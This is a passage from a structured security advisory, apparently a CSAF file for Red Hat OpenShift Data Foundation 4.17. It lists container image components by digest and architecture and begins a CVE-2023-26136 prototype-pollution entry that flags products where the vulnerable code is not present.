"9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:66de77eb933a0fb4e0d98d2c1326212d494f6c3aa2e235f27f2a641fb31ff4af_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", }, product_reference: "odf4/odf-multicluster-rhel9-operator@sha256:941371cee3ee7dd127d5663b7e1bcb39c6565031c11fb508f07c40f37aaee4d1_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:7c09fb5c685be2a3029d02a35417e681f3b034269d1ac3014c1c5cdd2e035e61_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:8ccd7099f174842dab551c27a55d822cfb12d8ba26c3528f605697cbfbbf8e70_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", }, product_reference: "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", }, product_reference: "odf4/odf-operator-bundle@sha256:01d80d9fc9cbc3f3fecab4716bde805ad97b1fbcd4942ecbb07eab9fb4714012_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", }, product_reference: "odf4/odf-operator-bundle@sha256:6e3b814a41abf41ec9cdb5d71aafc79a086fc37f2986a3fd74f75341a4af91a2_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", }, product_reference: "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:0d5aa39387a341a497a0cbc8d18c0e1e050e118b08243f5d8395ffe7394cc5f1_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:26541764bf0b79a4cc87600d1a1981a247d7678f9a8c37af62e80f22213159a7_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", }, product_reference: "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", }, product_reference: "odf4/odf-rhel9-operator@sha256:37af72217b81a8a7b0d968ec09a396f1840155f2a472eaa68927281f080d137f_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", }, product_reference: "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", }, product_reference: "odf4/odf-rhel9-operator@sha256:9d7f8b892351de60609c30d187c5547ba4bec3be2dadd0e6d8ded2c4f3c1e79e_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", }, product_reference: "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:1b641a6aa2c4b1bc79ab0188c56f533fd89459be71b2b34f794faebaa66fd1f5_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", }, product_reference: "odf4/odr-cluster-operator-bundle@sha256:40d75cfa1eb657512dc4da888a5bb793a3ef3d6726665bc9ad7009cdd4166a1f_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:50d04e71ae52f1a246d1509c5f2abbcb2f2bb2209090526b3357b8012b4b67d5_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", }, product_reference: "odf4/odr-hub-operator-bundle@sha256:d7e8549c1a5cabd7324c589eadf9ccebccc1abbfb69d47826baaeaebc283c6a3_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:0223d74679590c8a5fbd34f3d793c05ec671ecb406b2055166bd54f09f75bbda_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", }, product_reference: "odf4/odr-recipe-operator-bundle@sha256:987ed8aa1347a831f61a4d65011f5bd00a700c65f6e7fa669ff3f38131425705_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", }, product_reference: "odf4/odr-rhel9-operator@sha256:2f414dc954bca2cd17f0bbabea11a8f18437eb417c6266d8c4750ba96957fc87_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", }, product_reference: "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", }, product_reference: "odf4/odr-rhel9-operator@sha256:d9c38fe43617f214fea848ef7124d77f30358e2049390fc3bd3526986ff9ebbb_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", }, product_reference: "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:1055afb10a6ce469d2c77337878f510b29375a830f14505042da8a6d6081c438_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:5df96c3b3dc8cdad2c8b42fd9378dc55779cdb11f64eea5fa653101505d4d497_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", }, product_reference: "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64 as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:7488149277a76efe188086d283fa2acf732a4eca8bdeaa4de8744204876a77a2_amd64", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le", relates_to_product_reference: "9Base-RHODF-4.17", }, { category: "default_component_of", full_product_name: { name: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x as a component of RHODF 4.17 for RHEL 9", product_id: "9Base-RHODF-4.17:odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", }, product_reference: "odf4/rook-ceph-rhel9-operator@sha256:cf89aaa1ad0614707748c0ab0b26ee40855053b0f4932cd5edaa8ccf8b1470e7_s390x", relates_to_product_reference: "9Base-RHODF-4.17", }, ], }, vulnerabilities: [ { acknowledgments: [ { names: [ "Kokorin Vsevolod", ], }, ], cve: "CVE-2023-26136", cwe: { id: "CWE-1321", name: "Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')", }, discovery_date: "2023-07-03T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64", "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x", "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le", "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64", "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x", "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le", "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:f8c6007e32c54ffe0597952ae6eb1d38435188d605f3995ec785dff43da4257d_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:824823d527bdbbdd2abb773e054c12b41243e15467ada76689af4fdd6fae894a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:9521eae22f7669dea4b31841d7cfe11e5d92155b11785afb2977cea9c5d917dc_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-console-rhel9@sha256:a94961fd2c5aea06922c9c365c3a6296abf073e09a520f190a45f687cabc7b1d_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:26503c487a93ad520e1953ccad9200be808bc93648db90eaba3a73a340483541_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:78f3e869e50bd0e69d8e6efc6e6de357aadcc06ac3659d6ec7a053cda11be88b_amd64", "9Base-RHODF-4.17:odf4/ocs-client-operator-bundle@sha256:fb473ae152002d124ff662e94ca9bf68f8f6a4c61c40d4f2929a55ef1c25cd20_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:0bb022ca33965fb0f9de7df36f15377a33c90d873050dcbd763370ac1f06295a_s390x", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:1070f8191e3ead7781876ed4d84ac5c5eeb54a1fa4d2c40701ebf393d345111c_ppc64le", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64", "9Base-RHODF-4.17:odf4/ocs-client-rhel9-operator@sha256:e7afe93fc1d88c385edc3d8ab3173e7bfb4a4f890d371836d5d2f72a2eb4abb5_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:147c2497071460ba266fc5ef0768d82edb6be9d7ffaa0c514e49308cf8017e7a_ppc64le", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:28fd2ef06dbf379ad4204877a3492933a731f2bc1d6dd7fc1600f52a3dc3ca47_amd64", "9Base-RHODF-4.17:odf4/ocs-metrics-exporter-rhel9@sha256:6616912ec376e6993346b38bf637eb47d7a00aa9f58120899470c8353be02a0e_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:60f6533b7262bbfad59c5e14dff71878d3ea501c3b46194155ce53bc43a119e4_amd64", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:664c467321c9a5c3fec9d4fd85e16ab50677684b480cd1f346638f794ee7357c_s390x", "9Base-RHODF-4.17:odf4/ocs-operator-bundle@sha256:b14752e1e9e6b004429f3c36dbaf4ec4d36d22ab9ac84c2d5158e8fbdfb214dd_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:3472c7c043b318c2569e8a900527b13d052f1860082dba13723514795cedeec0_ppc64le", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:54a164ce15d25597fa3939709acbe467f728ce4f4165771a685fc507edfb92a3_s390x", "9Base-RHODF-4.17:odf4/ocs-rhel9-operator@sha256:cfa36a55dc542e3e1332a55a59588a753f80e32d905847e51efdd1478fd58f0b_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:0e2a71ed4eaa44f786428e18e01d90d3b0384169c78c5654e2ebbaac3a5ee2a4_ppc64le", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:8046b84915034f60a5e5e349b001f04b713b3aa71ced136390c5086e0c351dd4_amd64", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:9cbf21dad9ed5738ae1feb112707af3e74e02784795addf07ee4228bbd22e932_s390x", "9Base-RHODF-4.17:odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:89cc7f0d6adb957e0f3adbdb2c023d4a6dda89e388a94d0b4015e0853971075e_ppc64le", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:917e625bfea670e543f857cf7cea31380b76ceac862bee61cc490cebabd23081_amd64", "9Base-RHODF-4.17:odf4/odf-console-rhel9@sha256:b1ba270980579090845909bb4f1e8a7b98ce8816c7c5ea60903432d138d29310_s390x", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:2be1d5ad630b9e91f30e0c82cfee52231d095cee87908949170e40a39f4ed814_ppc64le", "9Base-RHODF-4.17:odf4/odf-cosi-sidecar-rhel9@sha256:37ec39720b1ce9701630635f158ad20414b1cda335b15b11526a7838ed189a54_s390x", 